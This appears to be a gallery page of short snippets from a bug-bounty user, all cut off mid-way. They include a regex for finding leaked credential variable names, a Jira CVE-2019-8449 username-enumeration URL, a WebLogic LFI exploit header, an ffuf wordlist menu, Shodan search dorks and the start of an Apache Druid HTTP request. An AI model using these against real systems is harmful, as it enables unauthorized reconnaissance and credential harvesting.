s41n1k

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

s41n1k

# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

s41n1k

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

• The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

s41n1k

index.html
robots.txt
favicon.ico
Makefile
.gitignore
404.html
index.js
README.md
500.html
422.html

s41n1k

cve-2019-8449 
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. 
 https://jira.atlassian.com/browse/JRASERVER-69796
 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================

s41n1k

# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371

# Description

s41n1k

#!/bin/bash

echo "###############################"
echo "#           Ffuf              #"
echo "###############################"
echo ""
echo ""
echo "[1] subdomains.txt"
echo "[2] subdomain-large.txt"
echo "[3] raft-large-directories.txt"

s41n1k

hostname:target.com | to find all asset available for target.com on shodan
http.title:"title" | to find server/host with similer title
http.html:"/file" | to find server/host with similar path 
html:"context" |  to find server/host with similar string
server: "apache 2.2.3" | to find server/host with same server
port:80 | to find server/host with same port
os:"windows" | to find server/host with same os
asn:AS3214 | to find host/server with matched asn
http.status:200 | to find server/host with 200 http response code
http.favicon.hash:"hash" | to find server/host with same favico hash

s41n1k

POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close